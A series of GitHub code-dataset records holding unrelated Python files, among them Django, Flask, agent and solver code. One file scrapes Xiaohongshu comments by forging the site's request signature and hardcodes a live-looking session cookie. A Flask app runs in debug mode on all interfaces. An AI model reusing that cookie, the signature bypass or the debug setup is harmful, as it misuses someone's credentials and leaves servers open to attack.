DF.append(dfs)\n return DF\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n","repo_name":"NTA-Code/cfmid","sub_path":"Search code/CosineDotProduct_v24.py","file_name":"CosineDotProduct_v24.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"1397366877","text":"from setuptools import setup\n\npackage_name = 'rosbag2_upgrader'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='nm',\n maintainer_email='nhma@mmmi.sdu.dk',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'upgrade = rosbag2_upgrader.upgrade:main'\n ],\n },\n)\n","repo_name":"nhma20/rosbag2_upgrader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74263096080","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.BoardListView.as_view(), name='home'),\n path('api/boards/', views.get_all_boards),\n path('api/boards//', views.get_particular_board),\n path('api/boards//topics/', views.get_all_topics_of_particular_board),\n path('api/boards//topics//', views.get_particular_topic),\n path('boards//', views.TopicListView.as_view(), name='board_topics'),\n path('boards//new/', views.new_topic, name='new_topic'),\n path('boards//topics//', views.PostListView.as_view(), name='topic_posts'),\n path('boards//topics//reply/', views.reply_topic, name='reply_topic'),\n path('boards//topics//posts//edit/', views.PostUpdateView.as_view(), name='edit_post'),\n]\n","repo_name":"KishwarMaheen/myproject","sub_path":"myproject/boards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31457092072","text":"from flask import Flask, render_template, request\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport waitress\r\n\r\napp = Flask(__name__)\r\n\r\ndef process_command(command):\r\n if command.lower() == \"hello\":\r\n return \"welcome to cloudconsole v1.0!\"\r\n elif command.lower().startswith(\"say \"):\r\n return command[4:]\r\n elif command.lower() == \"help\":\r\n return \"\"\"commands:\r\n say - type your text\r\n clear - clear the console\r\n help - display list of commands\r\n info - display info\"\"\"\r\n elif command.lower() == \"clear\":\r\n return \"console cleared.\"\r\n elif command.lower() == \"info\":\r\n return \"\"\"made by toxinsfx\r\n (made in python)\r\n \"\"\"\r\n else:\r\n return \"command not recognized.\"\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n input_text = request.form['input_text']\r\n response = process_command(input_text)\r\n return render_template('index.html', response=response)\r\n return render_template('index.html')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0') # debug\r\n #waitress.serve(app, host='0.0.0.0', port=7777)\r\n","repo_name":"wtftoxins/Consolev1.0-src","sub_path":"consolev2.py","file_name":"consolev2.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18846479512","text":"#print(\"in RFCA, importing RFClassifier...\")\nimport RFClassifier as rfc\n#print(\"in RFCA, importing DatasetManager...\")\nimport DatasetManager as dsm\n#print(\"in RFCA, importing random...\")\nimport random as rd\n#print(\"in RFCA, importing spade...\")\nimport spade\n#print(\"in RFCA, importing pandas...\")\nimport pandas as pd\nimport os\n\n#TRAINING_SIZE = (rd.randrange(4) + 4) * 100\nTRAINING_SIZE = 4445\nDS_MANAGER = dsm.DatasetManager(TRAINING_SIZE)\nTRAIN,TEST = DS_MANAGER.getSets()\nMSG_WAIT = 2\n\n# Each agent will perform its own classification, so they will all have their own instance\n# of RFClassifier. Agents differ only in how they communicate\nclass BaseAgent(spade.Agent.Agent):\n\tdef __init__(self,myID,myPass,mm,nt,nb,bs):\n\t\t# Approx 100 trees\n\t\tself.classifier = rfc.RFClassifier(rd.randrange(nb+1)*bs + (nt - (nb/2)*bs),True,False,mm)\n\n\t\t# Exactly 1 tree\n\t\t#self.classifier = rfc.RFClassifier(1,True,False)\n\n\n\t\tsuper(BaseAgent,self).__init__(myID,myPass)\n\n\tdef getRandom(self,row):\n\t\treturn rd.random()\n\n\t# Find the appropriate list index (over probability list l)\n\t# for the value c\n\tdef determineIndex(self,l,c):\n\t\tif (c > 1):\n\t\t\treturn -1 # Error, value must be 0 <= c <= 1\n\t\tcounter = 1\n\t\twhile counter <= len(l):\n\t\t\tif sum(l[:counter]) >= c:\n\t\t\t\treturn counter-1\n\t\t\tcounter+=1\n\t\t\n\tdef chooseStateEstimate(self,row,probs):\n#\tn = 2 case\n# \t\tif row['Belief Val'] < cutoff:\n# \t\t\treturn row['Predicted State']\n# \t\telse:\n# \t\t\treturn row['Alternate State']\n\t\tchoice = self.determineIndex(probs, row['Belief Val'])\n\t\tif choice == 0:\n\t\t\treturn row['Predicted State']\n\t\telse:\n\t\t\treturn row['Alternate State_{0}'.format(choice-1)]\n\n\tdef chooseRegionEstimate(self,row,probs):\n#\tn = 2 case\n# \t\tif row['Belief Val'] < cutoff:\n# \t\t\treturn row['Predicted Region']\n# \t\telse:\n# \t\t\treturn row['Alternate Region']\n\t\tchoice = self.determineIndex(probs, row['Belief Val'])\n\t\tif choice == 0:\n\t\t\treturn row['Predicted Region']\n\t\telse:\n\t\t\treturn row['Alternate Region_{0}'.format(choice-1)]\n\n\tdef makeGuess(self,df1,probs):\n\t\t#print('Inside the makeGuess function...')\n\n\t\t#print('Defining Lambdas...')\n\t\tstate_fn = lambda x: self.chooseStateEstimate(x,probs)\n\t\tregion_fn = lambda x: self.chooseRegionEstimate(x,probs)\n\n\t\t#print('Setting up new columns...')\n\t\t#df1['Alternate State'] = df2['Predicted State']\n\t\t#df1['Alternate Region'] = df2['Predicted Region']\n\t\t#print('Adding belief val...')\n\t\tdf1['Belief Val'] = df1.apply(self.getRandom, axis=1)\n\t\t#print('Getting educated state...')\n\t\tdf1['Educated State'] = df1.apply(state_fn, axis=1)\n\t\t#print('Getting educated region...')\n\t\tdf1['Educated Region'] = df1.apply(region_fn, axis=1)\n\t\t#print('Returning dataframe...')\n\t\t#print('Exiting makeGuess')\n\t\treturn df1\n\n\tdef addMetricColumns(self,df):\n\t\t#print('Setting result stuff...')\n\t\ted_states_results = (df['State']==df['Educated State']).apply(self.boolToInt)\n\t\ted_regions_results = (df['Region']==df['Educated Region']).apply(self.boolToInt)\n\t\torig_states_results = (df['State']==df['Predicted State']).apply(self.boolToInt)\n\t\torig_regions_results = (df['Region']==df['Predicted Region']).apply(self.boolToInt)\n\n\t\t#print('calculations')\n\t\ttot_recs = len(ed_states_results)\n\n\t\tos_num = sum(orig_states_results)\n\t\tor_num = sum(orig_regions_results)\n\t\tos_pct = 
float(os_num)/float(tot_recs)\n\t\tor_pct = float(or_num)/float(tot_recs)\n\n\t\tes_num = sum(ed_states_results)\n\t\ter_num = sum(ed_regions_results)\n\t\tes_pct = float(es_num)/float(tot_recs)\n\t\ter_pct = float(er_num)/float(tot_recs)\n\n\t\t#print('Setting some columns to nums')\n\t\tdf['States Guessed'] = os_num\n\t\tdf['States Guessed %'] = os_pct\n\t\tdf['Regions Guessed'] = or_num\n\t\tdf['Regions Guessed %'] = or_pct\n\t\tdf['Informed States Guessed'] = es_num\n\t\tdf['Informed States Guessed %'] = es_pct\n\t\tdf['Informed Regions Guessed'] = er_num\n\t\tdf['Informed Regions Guessed %'] = er_pct\n\n\t\t#print('returning')\n\t\treturn df\n\n\tdef boolToInt(self,b):\n\t\treturn int(b)\n\n\nclass TalkerAgent(BaseAgent):\n\t\"\"\"This agent will calculate classifications and send to another agent\"\"\"\n\n\tdef __init__(self,receiverID,myID,myPass,mm,nt,nb,bs):\n\t\tself.receiver_id = spade.AID.aid(name=receiverID,\n\t\t\t\taddresses=[\"xmpp://\"+receiverID])\n\t\tsuper(TalkerAgent,self).__init__(myID,myPass,mm,nt,nb,bs)\n\n\tclass InformBehav(spade.Behaviour.OneShotBehaviour):\n\n\t\tdef _process(self):\n\t\t\t#print(\"My receiver is called {0}\".format(self.myAgent.receiver_id))\n\t\t\treceiver = self.myAgent.receiver_id\n\n\t\t\tself.msg = spade.ACLMessage.ACLMessage()\n\t\t\tself.msg.setPerformative(\"inform\")\n\t\t\tself.msg.setOntology(\"classifierResults\")\n\t\t\tself.msg.setLanguage(\"OWL-S\")\n\t\t\tself.msg.addReceiver(receiver)\n\n\t\t\ttestedSet = self.myAgent.classifier.perform_classification(TRAIN,TEST)\n\t\t\t#print('Tested!\\nSetting content...')\n\t\t\ttestedSet['Estimators'] = self.myAgent.classifier.num_estimators\n\t\t\tmessageText = testedSet[['Predicted State','Predicted Region','Estimators']].to_json()\n\t\t\t#print('Final string is {0} chars long...'.format(len(messageText)))\n\t\t\tself.msg.setContent(messageText)\n\t\t\t#self.msg.setContent('ehllo guvnor')\n\t\t\t#print('Set!')\n\t\t\t#self.msg.setContent(\"test\")\n\n\t\t\t#print(type(self.msg.getContent()))\n\t\t\t#print(self.msg.getContent()[:100])\n\t\t\tprint('{0} sending message to {1}'.format(self.myAgent.getName(),receiver.getName()))\n\t\t\tself.myAgent.send(self.msg)\n\t\t\tprint('Sent!')\n\t\t\tdel(self.msg)\n\t\t\tdel(testedSet)\n\t\t\tdel(messageText)\n\t\t\tdel(self.myAgent.classifier)\n\t\t\t#print('Killin\\' it')\n\t\t\tagent_name = self.myAgent.getName()\n\t\t\tself.myAgent.stop()\n\t\t\t#print('Killed: {0}'.format(agent_name))\n\n\tdef _setup(self):\n\t\tb = self.InformBehav()\n\t\tself.setDefaultBehaviour(b)\n\nclass ListenerAgent(BaseAgent):\n\t\"\"\"This agent will receive messages only\"\"\"\n\tdef __init__(self,myID,myPass,numTalkers,mm,nt,nb,bs):\n\t\tself.numTalkers = numTalkers\n\t\tself.numHeard = 0\n\t\tself.probability = []\n\t\tself.dataFrame = None\n\t\tsuper(ListenerAgent,self).__init__(myID,myPass,mm,nt,nb,bs)\n\t\n\tclass ReceiveBehav(spade.Behaviour.Behaviour):\n\t\t\n\t\tdef _process(self):\n\t\t\tself.msg = None\n\t\t\t#print('Hello _process')\n\n\t\t\tself.msg = self._receive(True, MSG_WAIT)\n\t\t\tif self.msg:\n\t\t\t\t#print(\"Received!\")\n\n\n\t\t\t\tmyNewDataFrame = pd.read_json(self.msg.getContent())\n\n\t\t\t\t#print('Okay, chugging along')\t\n\t\t\t\tif self.myAgent.numHeard == 0:\n\t\t\t\t\tself.myAgent.dataFrame = self.myAgent.classifier.perform_classification(TRAIN,TEST)\n\t\t\t\t\t#print('Muckling with probability array')\n\t\t\t\t\tself.myAgent.probability.append(self.myAgent.classifier.num_estimators)\n\t\t\t\t\t#print('Consider it 
muckled')\n\t\t\t\t\t\n\t\t\t\tmyDataFrame = self.myAgent.dataFrame\n\t\t\t\t\t\n\t\t\t\t#print('Still up to no good...')\n\t\t\t\tself.myAgent.probability.append(myNewDataFrame['Estimators'].max())\n\n\t\t\t\tmyDataFrame['Alternate State_{0}'.format(self.myAgent.numHeard)] = myNewDataFrame['Predicted State']\n\t\t\t\tmyDataFrame['Alternate Region_{0}'.format(self.myAgent.numHeard)] = myNewDataFrame['Predicted Region']\n\n\t\t\t\t\n\t\t\t\t#print('numheard is {0}... incrementing...'.format(self.myAgent.numHeard))\n\t\t\t\tself.myAgent.numHeard += 1\n\t\t\t\t#print(\"numheard is now {0}, but numtalkers is {1}\".format(self.myAgent.numHeard,self.myAgent.numTalkers))\n\t\t\t\tif self.myAgent.numHeard == self.myAgent.numTalkers:\n\t\t\t\t\t# decide on answers and spit out csv\n\t\t\t\t\tprint(self.myAgent.probability)\n\t\t\t\t\tsprob = sum(self.myAgent.probability)\n\t\t\t\t\talpha_prob = [float(i)/float(sprob) for i in self.myAgent.probability]\n\t\t\t\t\tprint(alpha_prob)\n\n\t\t\t\t\tmyDataFrame = self.myAgent.makeGuess(myDataFrame,alpha_prob)\n\t\t\t\t\t\n\t\t\t\t\tmyDataFrame = self.myAgent.addMetricColumns(myDataFrame)\n\t\t\t\t\t\n\t\t\t\t\twith open('sim4out.csv','a') as simout:\n\t\t\t\t\t\tsimout.write('{0},{1},{2},{3},{4},{5}\\n'.format(\n\t\t\t\t\t\t\t\tmyDataFrame['States Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Regions Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed States Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed Regions Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed States Guessed'].max()-myDataFrame['States Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed Regions Guessed'].max()-myDataFrame['Regions Guessed'].max(),\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t))\n\t\t\t\t\t\n\t\t\t\t\tmyDataFrame.to_csv('final.csv')\n\t\t\t\t\tos._exit(0)\n\n\n\t\t\t\t#print(\"Ontology: {0}\".format(self.msg.getOntology()))\n\t\t\t\t\n\tdef _setup(self):\n\t\tb = self.ReceiveBehav()\n\n\t\tclassifier_template = spade.Behaviour.ACLTemplate()\n\t\tclassifier_template.setOntology(\"classifierResults\")\n\t\tmsg_template = spade.Behaviour.MessageTemplate(classifier_template)\n\n\t\tself.addBehaviour(b,msg_template)\n\n","repo_name":"andpberr/dist_ai_project","sub_path":"RFCAgents.py","file_name":"RFCAgents.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3862582404","text":"from __future__ import division\nimport numpy as np\nimport scipy.sparse as spa\nimport scipy.sparse.linalg as spla\nfrom .utils import compute_trans, interpolate, pu_scale\nfrom .bases_solver import compute_bases\nfrom .corr_solver import compute_corr\nfrom . import predict_inner\nfrom .predict_inner import predict\nfrom .recon_flux import recon_flux\n\n\ndef solveMSFV(G, CG, DG, K, q, dirichlet=None, verbose=False,\n flux=False, model=None, scale=True, ret_all=False):\n \"\"\"\n Return: result [dict]\n result:\n pressure [3Darray]\n coarsepressure [3Darray]\n bases [list of csr_matrix]\n correction [csr_matrix]\n coarsesystem [dict]\n A [csr_matrix]\n C [array]\n q [array]\n \"\"\"\n\n # if verbose:\n # print 'Solving basis and correction functions...'\n\n if model is None:\n bases = compute_bases(G, CG, DG, K, verbose)\n else:\n # do the naive thing for now\n bases = compute_bases(G, CG, DG, K, verbose)\n bases = predict(bases, G, CG, DG, K, model, verbose=verbose)\n if scale:\n pu_scale(bases, DG) # in place modification\n\n corr = compute_corr(G, CG, DG, K, q, verbose)\n\n # Compute transmissibilities\n TX, TY, TZ = compute_trans(G, K)\n T = np.concatenate((TX.ravel(), TY.ravel(), TZ.ravel()))\n\n # Number of coarse cells\n N_cg = len(CG['centers'])\n\n # Coarse flux matrix\n A = spa.lil_matrix((N_cg, N_cg))\n\n # Correction vector\n C = np.zeros(N_cg)\n\n # Coarse source/sink vector\n q_cg = np.zeros(N_cg)\n\n # if verbose:\n # print 'Building coarse system of equations...'\n\n for i in range(N_cg):\n neighbors = CG['neighbors'][i] + [i]\n edges, border_in, border_out = CG['borders'][i]\n\n # Flux by basis functions\n for k in neighbors:\n basis_in = bases[k][border_in].toarray().ravel()\n basis_out = bases[k][border_out].toarray().ravel()\n A[i, k] = A[i, k] + np.dot(basis_in - basis_out, T[edges])\n\n # Flux by correction function\n corr_in = corr[border_in].toarray().ravel()\n corr_out = corr[border_out].toarray().ravel()\n C[i] = np.dot(corr_in - corr_out, T[edges])\n\n # Compute q_cg\n for i in range(N_cg):\n q_cg[i] = np.sum(q[CG['cells'][i]])\n\n # Impose boundary conditions\n if dirichlet is not None:\n large_number = 1e200\n idxs = dirichlet[:, 0].astype('int')\n vals = dirichlet[:, 1]\n A[idxs, idxs] = large_number\n q_cg[idxs] = large_number * vals\n else:\n A[0, 0] = A[0, 0] + sum(K[0, 0, 0, :])\n\n A = A.tocsr()\n\n # if verbose:\n # print 'Solving coarse system...'\n P_cg = spla.spsolve(A, q_cg - C)\n\n # if verbose:\n # print 'Interpolating solution to fine grid...'\n P = interpolate(P_cg, G, CG, bases, corr)\n\n P = np.reshape(P, (G['nz'], G['ny'], G['nx']))\n P_cg = np.reshape(P_cg, (CG['nz'], CG['ny'], CG['nx']))\n\n if flux:\n # if verbose:\n # print 'Computing flux...'\n V = recon_flux(P, G, CG, K, q)\n else:\n # if verbose:\n # print 'Skipping flux computation...'\n V = {}\n\n if ret_all:\n result = {}\n result['pressure'] = P\n result['flux'] = V\n result['pressurecoarse'] = P_cg\n result['bases'] = bases\n result['correction'] = corr\n result['coarsesystem'] = {}\n result['coarsesystem']['A'] = A\n result['coarsesystem']['C'] = C\n result['coarsesystem']['q'] = q_cg\n return result\n else:\n return P\n","repo_name":"chanshing/python_msfv","sub_path":"msfv_solver.py","file_name":"msfv_solver.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"43798430003","text":"# 25632 소수 부르기 게임\n# 31256 KB / 44 ms\n\na, b = map(int, input().split())\nc, d = map(int, input().split())\n\n# 최솟값, 최댓값\nmin_ = min(a, c)\nmax_ = max(b, d)\n\ng = [1]*(max_+1)\ncnt1 = cnt2 = 0\n\n# min~max 에라토스테네스의 체\nfor i in range(2, int(max_**0.5)+1):\n for j in range(min_, max_+1):\n if j == i:\n continue\n if g[j]:\n if j%i == 0:\n g[j] = 0\n\n# set로 각각의 소수 저장\nyt = set([i for i in range(a, b+1) if g[i]])\nyj = set([i for i in range(c, d+1) if g[i]])\n# 합집합\ns = yt.union(yj)\n# 각각 원소의 수\nyt_l = len(yt)\nyj_l = len(yj)\ns_l = len(s)\n\n# yj 차집합이 더 클 때\nif s_l - yt_l > s_l - yj_l:\n print('yj')\n# yt 차집합\nelif s_l - yt_l < s_l - yj_l:\n print('yt')\n# 같을 때 교집합 원소의 수 홀짝 판별\nelse:\n if s_l-len(yt-yj)-len(yj-yt) & 1:\n print('yt')\n else:\n print('yj')","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week09_230309/25632_소수_부르기_게임/25632_정광배.py","file_name":"25632_정광배.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"13973329383","text":"def count_chars_words_lines(filename):\n with open(filename, 'r') as f:\n num_chars = 0\n num_words = 0\n num_lines = 0\n\n for line in f:\n num_lines += 1\n num_chars += len(line)\n words = line.split()\n num_words += len(words)\n return (num_chars, num_words, num_lines)\n\nfilename = 'file.txt' \ncounts = count_chars_words_lines(filename)\nprint(\"Number of characters : \", counts[0])\nprint(\"Number of words : \", counts[1])\nprint(\"Number of lines : \", counts[2])","repo_name":"imhrithik/Python-MCA","sub_path":"Q10/Q10.py","file_name":"Q10.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18322693631","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef next_SW(now, prev, sn):\n notSW = {\"S\": \"W\", \"W\": \"S\"}\n if now == \"S\" and sn:\n return prev\n if now == \"S\" and 1-sn:\n return notSW[prev]\n if now == \"W\" and sn:\n return notSW[prev]\n if now == \"W\" and 1-sn:\n return prev\n\n\ndef main():\n N = NI()\n S = SI()\n D = {\"o\": 1, \"x\": 0}\n SorW = [\"S\", \"W\"]\n S = [D[s] for s in S]\n case = [\"SS\", \"SW\", \"WS\", \"WW\"]\n for T in case:\n for i in range(1, N):\n now, prev = T[i], T[i-1]\n sn, sp = S[i], S[i-1]\n T += next_SW(now, prev, sn)\n if next_SW(T[0], T[-1], S[0]) == T[1] and T[0] == T[-1]:\n print(T[:-1])\n exit()\n print(-1)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC055/ABC055D.py","file_name":"ABC055D.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42515205775","text":"import h5py\nimport os\n\nfrom . import REFERENCE_H5\n\nROOT = os.path.dirname(os.path.abspath(__file__))\n\n\nclass BasePredictor(object):\n def __init__(self, model_dir):\n self.model_dir = model_dir\n self.reference_h5 = os.path.join(ROOT, \"..\", \"data\", REFERENCE_H5)\n\n def _get_X(self, X=None, idxs=None, head=None, tail=None):\n print(\"Getting X\")\n if X is not None:\n return X\n if idxs is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][idxs]\n elif head is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][:head]\n elif tail is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][-tail:]\n else:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][:]\n return X\n","repo_name":"ersilia-os/eos-lite-chem","sub_path":"eoslitechem/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6703370279","text":"import getopt\nimport io\nimport sys\n\nimport k8v\n\n\ndef usage(output: io.IOBase) -> None:\n \"\"\"Display the command line usage help screen.\"\"\"\n\n with open(\"etc/usage.md\") as f:\n for line in f.readlines():\n output.write(line)\n f.close()\n\n\ndef main(argv: list) -> None:\n \"\"\"Main execution to setup the Viewer.\"\"\"\n\n viewer: k8v.viewer.Viewer = k8v.viewer.Viewer()\n try:\n opts, args = getopt.getopt(\n argv,\n \"ARtvhc:e:f:i:n:o:r:s:\",\n [\n \"all-related\",\n \"all-resources\",\n \"colors\",\n \"all-namespaces\",\n \"exclude\",\n \"file\",\n \"help\",\n \"include\",\n \"namespace\",\n \"output\",\n \"resource\",\n \"selector\",\n \"verbose\",\n ],\n )\n except getopt.GetoptError as e:\n usage(viewer.config.file)\n print(f\"ERROR: {e}\")\n print()\n sys.exit(2)\n\n for opt, arg in opts:\n # display the help\n if opt in (\"-h\", \"--help\"):\n usage(viewer.config.file)\n sys.exit()\n\n # display modes\n elif opt in (\"-c\", \"--colors\"):\n viewer.config.colors = arg\n elif opt in (\"-o\", \"--output\"):\n viewer.config.output = arg\n elif opt in (\"-v\", \"--verbose\"):\n viewer.config.verbose = True\n elif opt in (\"-f\", \"--file\"):\n viewer.config.filename = arg\n\n # namespaces\n elif opt in (\"-A\", \"--all-namespaces\"):\n viewer.config.namespaces = None\n elif opt in (\"-n\", \"--namespace\"):\n if viewer.config.namespaces is None:\n viewer.config.namespaces = []\n viewer.config.namespaces.append(arg)\n\n # search criteria\n elif opt in (\"-t\", \"--all-related\"):\n viewer.config.related = True\n elif opt in (\"-e\", \"--exclude\"):\n viewer.config.excludes.append(arg)\n elif opt in (\"-i\", \"--include\"):\n viewer.config.includes.append(arg)\n elif opt in (\"-R\", \"--all-resources\"):\n viewer.config.resources = None\n elif opt in (\"-r\", \"--resource\"):\n for type in k8v.resource_types.ResourceType:\n if arg in type.value:\n viewer.config.resources.append(type)\n elif opt in (\"-s\", \"--selector\"):\n key, value = arg.split(\"=\")\n viewer.config.selectors[key] = value\n\n # any remaining arguments are filter queries\n for arg in args:\n viewer.config.includes.append(arg)\n\n # Search for matching resources and display them\n viewer.view()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"jasonhanks/k8v","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14719613484","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/9/14 13:18\n# @Author : yogurt\n\nimport json\nimport pprint\nimport re\nimport time\nimport execjs\nimport requests\n\njs = execjs.compile(open(r'./redbook.js', 'r', encoding='utf-8').read())\n\n# q = js.call('get_xs','/api/sns/web/v2/comment/page?note_id=64ddde49000000000103ccaa&cursor=&top_comment_id=', '', '186ca73ccb9ht3l50qn35jga5z39zuv4j3l7i80a850000380091')\n# print(q)\n\n\ndef requses_spider(url, method, headers=None, params=None,timeout=None,proxies=None, default=''):\n count = 0\n while True:\n try:\n res = getattr(requests, method)(url=url, headers=headers, params=params,proxies=proxies, timeout=timeout)\n break\n except Exception as e:\n if count > 4:\n print(\"程序请求异常次数过多请联系程序员 13217252129\",default, e)\n time.sleep(2)\n return res\n\n# 初始化请求,设置加密headers\ndef init(url, cookie):\n headers = {\n 'accept': 'application/json, text/plain, */*',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'referer': 'https://www.xiaohongshu.com/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n }\n headers['cookie'] = cookie\n # 获取加密 a1\n a1_list = re.findall('a1=(.*?);', cookie)\n # 获取url 加密参数\n encry_url = url.split('xiaohongshu.com')[-1]\n if a1_list:\n xs = js.call('get_xs', encry_url, '', a1_list[0])\n headers['x-s'] = xs['X-s']\n else:\n print(\"复制提供的cookie有错误请重新,复制cookie链接\")\n exit()\n return headers\ndef flag_lenlist(list_data:list):\n if len(list_data):\n return list_data\n else:\n return False\ndef paser_talking(text,cookie, url):\n jsdata = json.loads(text)\n print(jsdata)\n list_save_data = []\n if jsdata['code'] == 0:\n first_comments =jsdata['data']['comments']\n if flag_lenlist(first_comments):\n for first_comment in first_comments:\n json_data = {}\n json_data['用户id'] = first_comment['id']\n json_data['ip地址'] = first_comment.get('ip_location')\n json_data['一级评论'] = first_comment['content']\n json_data['点赞人数'] = first_comment['like_count']\n json_data['评论人数'] = first_comment['sub_comment_count']\n if flag_lenlist(first_comment['sub_comments']):\n list_sub = []\n for sub_comment in first_comment['sub_comments']:\n dict_sub = {}\n dict_sub['用户id'] = sub_comment['id']\n dict_sub['ip地址'] = sub_comment.get('ip_location')\n dict_sub['二级用户评论'] = sub_comment['content']\n dict_sub['点赞人数'] = sub_comment['like_count']\n dict_sub['回复用户'] = sub_comment['target_comment']['id']\n list_sub.append(dict_sub)\n json_data['二级评论信息'] = list_sub\n list_save_data.append(json_data)\n # 打印输出存储数据\n pprint.pprint(list_save_data)\n print(\"cursor\", jsdata['data']['cursor'])\n spider_title(url, cookie, jsdata['data']['cursor'])\n else:\n print(\"解析未能成功, 请尝试更换cookie后重试\", jsdata)\n exit()\n\n\ndef spider_title(url, cookie, cursor):\n req_url = 'https://edith.xiaohongshu.com/api/sns/web/v2/comment/page?note_id=' +url.split('/')[-1] + f'&cursor={cursor}&top_comment_id='\n print(req_url)\n # 获取帖子回复用户数据\n hearders = init(req_url, cookie)\n print(hearders['x-s'])\n text = requses_spider(req_url, 'get', headers=hearders).text\n paser_talking(text, cookie, url)\n\n\n\n\nif __name__ == '__main__':\n\n url = \"https://www.xiaohongshu.com/explore/64dbb998000000000b0282f4\"\n cookie = \"acw_tc=064f56ad72f8d9cdb7847c6d20367667f36d097feb36e9104025a9819f41acb1; abRequestId=3580adae-8b25-58cf-a420-addb927d0474; webBuild=3.10.6; xsecappid=xhs-pc-web; a1=18b12a2f127ov23rszma06l94hz8zlte73yqxusog50000376744; webId=05223878527e28a9f3f5ff2ff9c8413c; 
websectiga=2845367ec3848418062e761c09db7caf0e8b79d132ccdd1a4f8e64a11d0cac0d; gid=yYDyJ0Ji0yWiyYDyJ0Jiyq7MJWlhJqFMu608vlkK1j4xuA28Yu19dC888qWKW448SjqjKKY8; unread={%22ub%22:%2264f4014b000000001e00df56%22%2C%22ue%22:%226501be1b000000001f0063de%22%2C%22uc%22:29}; sec_poison_id=67307734-39f8-441b-a01d-ef9f62f4a36d; web_session=040069b2959d13cb7043ed3716374b347deda9\"\n    # dispatch by URL type\n    if '/explore/' in url:\n        spider_title(url, cookie, '')\n    # spider_main(url, cookie)","repo_name":"notallyogurt/python_spider","sub_path":"小红书评论/test_redbook.py","file_name":"test_redbook.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"40329793451","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom .models import Customer, Product, Cart, Order\nfrom .forms import CustomerRegistrationForm, ProfileForm\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n# Products and Info\nclass ProductView(View):\n def get(self, request):\n total_items = 0\n user = request.user\n topwears = Product.objects.filter(category='TW')\n bottomwears = Product.objects.filter(category='BW')\n smartphones = Product.objects.filter(category='SP')\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n return render(request, 'app/home.html', {'topwears': topwears,\n 'bottomwears':bottomwears,\n 'smartphones':smartphones, 'total_items':total_items})\n\nclass ProductDetailView(View):\n def get(self, request, product_id):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= 